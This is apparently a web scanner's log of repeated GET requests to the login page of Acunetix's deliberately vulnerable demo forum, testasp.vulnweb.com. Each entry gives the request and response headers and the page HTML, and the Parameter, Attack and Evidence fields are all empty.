<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p 